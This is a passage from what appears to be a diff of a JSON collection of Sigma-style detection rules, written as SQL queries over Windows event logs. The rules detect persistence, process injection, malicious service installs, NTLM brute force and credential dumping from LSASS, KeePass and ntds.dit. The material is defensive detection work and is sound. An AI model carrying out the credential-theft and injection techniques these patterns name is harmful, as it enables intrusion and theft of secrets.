ESCAPE '\\' OR TargetObject LIKE '%\\\\Content Indexer Cleaner' ESCAPE '\\' OR TargetObject LIKE '%\\\\D3D Shader Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Delivery Optimization Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Device Driver Packages' ESCAPE '\\' OR TargetObject LIKE '%\\\\Diagnostic Data Viewer database files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Downloaded Program Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\DownloadsFolder' ESCAPE '\\' OR TargetObject LIKE '%\\\\Feedback Hub Archive log files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Internet Cache Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Language Pack' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft Office Temp Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Offline Pages Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Old ChkDsk Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Previous Installations' ESCAPE '\\' OR TargetObject LIKE '%\\\\Recycle Bin' ESCAPE '\\' OR TargetObject LIKE '%\\\\RetailDemo Offline Content' ESCAPE '\\' OR TargetObject LIKE '%\\\\Setup Log Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error memory dump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error minidump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Setup Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Sync Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Thumbnail Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Update Cleanup' ESCAPE '\\' OR TargetObject LIKE '%\\\\Upgrade Discarded Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\User file versions' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Defender' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Error Reporting Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows ESD installation files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Upgrade Log Files' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" ], - "filename": "registry_add_persistence_disk_cleanup_handler_entry.yml" + "filename": "win_system_apt_stonedrill.yml" }, { - "title": "Potential Persistence Via New AMSI Providers - Registry", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", + "title": "KrbRelayUp Service Installation", + "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "status": "experimental", - "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "author": "Sittikorn S, Tim Shelton", "tags": [ - "attack.persistence" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "Legitimate security products adding their own AMSI providers. Filter these according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" ], - "filename": "registry_add_persistence_amsi_providers.yml" + "filename": "win_system_krbrelayup_service_installation.yml" }, { - "title": "Potential Persistence Via Logon Scripts - Registry", - "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "title": "Turla Service Install", + "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", "status": "test", - "description": "Detects creation of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", "attack.persistence", - "attack.lateral_movement" + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" ], - "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" + "filename": "win_system_apt_carbonpaper_turla.yml" }, { - "title": "PUA - Sysinternals Tools Execution - Registry", - "id": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", + "title": "Remote Utilities Host Service Install", + "id": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", "status": "experimental", - "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", + "description": "Detects Remote Utilities Host service installation on the target system.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.persistence" ], "falsepositives": [ - "Legitimate use of SysInternals tools. Filter the legitimate paths used in your environnement" + "Legitimate use of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sysinternals%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%\\\\rutserv.exe%' ESCAPE '\\' AND ImagePath LIKE '%-service%' ESCAPE '\\') OR ServiceName = 'Remote Utilities - Host'))" ], - "filename": "registry_add_pua_sysinternals_susp_execution_via_eula.yml" + "filename": "win_system_service_install_remote_utilities.yml" }, { - "title": "Potential Ursnif Malware Activity - Registry", - "id": "21f17060-b282-4249-ade0-589ea3591558", - "status": "test", - "description": "Detects registry keys related to Ursnif malware.", - "author": "megan201296", + "title": "Invoke-Obfuscation VAR+ Launcher - System", + "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1112" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_ursnif.yml" + "filename": "win_system_invoke_obfuscation_var_services.yml" }, { - "title": "Sysmon Configuration Change", - "id": "8ac03a65-6c84-4116-acad-dc1558ff7a77", - "status": "test", - "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", - "author": "frack113", + "title": "NetSupport Manager Service Install", + "id": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", + "status": "experimental", + "description": "Detects NetSupport Manager service installation on the target system.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence" ], "falsepositives": [ - "Legitimate administrative action" + "Legitimate use of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID = '16')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%\\\\NetSupport Manager\\\\client32.exe%' ESCAPE '\\' OR ServiceName = 'Client32'))" ], - "filename": "sysmon_config_modification.yml" + "filename": "win_system_service_install_netsupport_manager.yml" }, { - "title": "Sysmon Configuration Modification", - "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", + "title": "Potential RDP Exploit CVE-2019-0708", + "id": "aaa5b30d-f418-420b-83a0-299cb6024885", "status": "test", - "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", - "author": "frack113", + "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", + "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate administrative action" + "Bad connections or network interruptions" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('4', '16') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('56', '50') AND Provider_Name = 'TermDD')" ], - "filename": "sysmon_config_modification_status.yml" + "filename": "win_system_rdp_potential_cve_2019_0708.yml" }, { - "title": "Sysmon Blocked Executable", - "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", + "id": "52a85084-6989-40c3-8f32-091e12e17692", "status": "experimental", - "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation. Viewed on 2008 Server", + "author": "Cybex", "tags": [ - "attack.defense_evasion" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '27' AND Channel = 'Microsoft-Windows-Sysmon/Operational')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" ], - "filename": "sysmon_file_block_exe.yml" + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" }, { - "title": "Sysmon Process Hollowing Detection", - "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", - "status": "experimental", - "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "title": "Potential Remote Desktop Connection to Non-Domain Host", + "id": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", + "status": "test", + "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", + "author": "James Pemberton", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.012" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "There are no known false positives at this time" + "Host connections to valid domains, exclude these.", + "Host connections not using host FQDN.", + "Host connections to external legitimate domains." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '25' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Type = 'Image is replaced' AND NOT ((Image LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8001' AND TargetName LIKE 'TERMSRV%' ESCAPE '\\')" ], - "filename": "sysmon_process_hollowing.yml" + "filename": "win_susp_ntlm_rdp.yml" }, { - "title": "Sysmon Configuration Error", - "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", - "status": "experimental", - "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", - "author": "frack113", + "title": "NTLM Brute Force", + "id": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", + "status": "test", + "description": "Detects common NTLM brute force device names", + "author": "Jerry Shockley '@jsh0x'", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.credential_access", + "attack.t1110" ], "falsepositives": [ - "Legitimate administrative action" + "Systems with names equal to the spoofed ones used by the brute force tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '255' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8004' AND WorkstationName IN ('Rdesktop', 'Remmina', 'Freerdp', 'Windows7', 'Windows8', 'Windows2012', 'Windows2016', 'Windows2019'))" ], - "filename": "sysmon_config_modification_error.yml" + "filename": "win_susp_ntlm_brute_force.yml" }, { - "title": "CobaltStrike Process Injection", - "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", - "status": "test", - "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", - "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", + "title": "Suspicious Digital Signature Of AppX Package", + "id": "b5aa7d60-c17e-4538-97de-09029d6cd76b", + "status": "experimental", + "description": "Detects execution of AppX packages with known suspicious or malicious signature", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055.001" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppxPackaging/Operational' AND EventID = '157' AND subjectName = 'CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization')" ], - "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" + "filename": "win_appxpackaging_om_sups_appx_signature.yml" }, { - "title": "CreateRemoteThread API and LoadLibrary", - "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "title": "Atera Agent Installation", + "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", "status": "test", - "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate Atera agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_loadlibrary.yml" + "filename": "win_software_atera_rmm_agent_install.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", - "id": "fb656378-f909-47c1-8747-278bf09f4f4f", + "title": "MSI Installation From Suspicious Locations", + "id": "c7c8aa1c-5aff-408e-828b-998e3620b341", "status": "experimental", - "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects MSI package installation from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND (Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\\\\\\\*' ESCAPE '\\')) AND NOT ((Data LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\') OR (Data LIKE '%C:\\\\Windows\\\\TEMP\\\\UpdHealthTools.msi%' ESCAPE '\\')))" ], - "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "win_msi_install_from_susp_locations.yml" }, { - "title": "Remote Thread Creation in Suspicious Targets", - "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "title": "MSI Installation From Web", + "id": "5594e67a-7f92-4a04-b65d-1a42fd824a60", "status": "experimental", - "description": "Detects a remote thread creation in suspicious target images", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects installation of a remote msi file from web.", + "author": "Stamatis Chatzimangou", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.003" + "attack.execution", + "attack.t1218", + "attack.t1218.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND Data LIKE '%://%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_targets.yml" + "filename": "win_msi_install_from_web.yml" }, { - "title": "KeePass Password Dumping", - "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", + "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", "status": "experimental", - "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", - "author": "Timon Hackenjos", + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.005" + "attack.initial_access", + "attack.t1190" ], "falsepositives": [ - "Unknown" + "Other MSI packages for which your admins have used that name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_keepass.yml" + "filename": "win_vul_cve_2021_41379.yml" }, { - "title": "Bumblebee Remote Thread Creation", - "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "title": "Dump Ntds.dit To Suspicious Location", + "id": "94dc4390-6b7c-4784-8ffc-335334404650", "status": "experimental", - "description": "Detects remote thread injection events based on action seen used by bumblebee", + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate backup operation/creating shadow copies" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID = '325' AND Data LIKE '%ntds.dit%' ESCAPE '\\' AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Appdata\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\ntds.dit%' ESCAPE '\\'))" ], - "filename": "create_remote_thread_win_bumblebee.yml" + "filename": "win_esent_ntdsutil_abuse_susp_location.yml" }, { - "title": "Suspicious Remote Thread Target", - "id": "f016c716-754a-467f-a39e-63c06f773987", + "title": "Ntdsutil Abuse", + "id": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.execution" + ], "falsepositives": [ - "Unknown" + "Legitimate backup operation/creating shadow copies" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (SourceImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR SourceImage LIKE '%unknown process%' ESCAPE '\\' OR StartFunction = 'EtwpNotificationThread'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID IN ('216', '325', '326', '327') AND Data LIKE '%ntds.dit%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_remote_thread_target.yml" + "filename": "win_esent_ntdsutil_abuse.yml" }, { - "title": "Password Dumper Remote Thread in LSASS", - "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", - "status": "stable", - "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", - "author": "Thomas Patzke", + "title": "Microsoft Malware Protection Engine Crash - WER", + "id": "6c82cf5c-090d-4d57-9188-533577631108", + "status": "experimental", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.s0005", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Antivirus products" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Windows Error Reporting' AND EventID = '1001' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_lsass.yml" + "filename": "win_application_msmpeng_crash_wer.yml" }, { - "title": "Remote Thread Creation Ttdinject.exe Proxy", - "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "title": "Audit CVE Event", + "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", "status": "experimental", - "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", - "author": "frack113", + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "author": "Florian Roth (Nextron Systems), Zach Mathis", "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", "attack.defense_evasion", - "attack.t1127" + "attack.t1211", + "attack.credential_access", + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" ], - "filename": "create_remote_thread_win_ttdinjec.yml" + "filename": "win_audit_cve.yml" }, { - "title": "Suspicious Remote Thread Source", - "id": "66d31e5f-52d6-40a4-9615-002d3789a119", + "title": "Microsoft Malware Protection Engine Crash", + "id": "545a5da6-f103-4919-a519-e9aec1026ee4", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "author": "Perez Diego (@darkquassar), oscd.community", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", 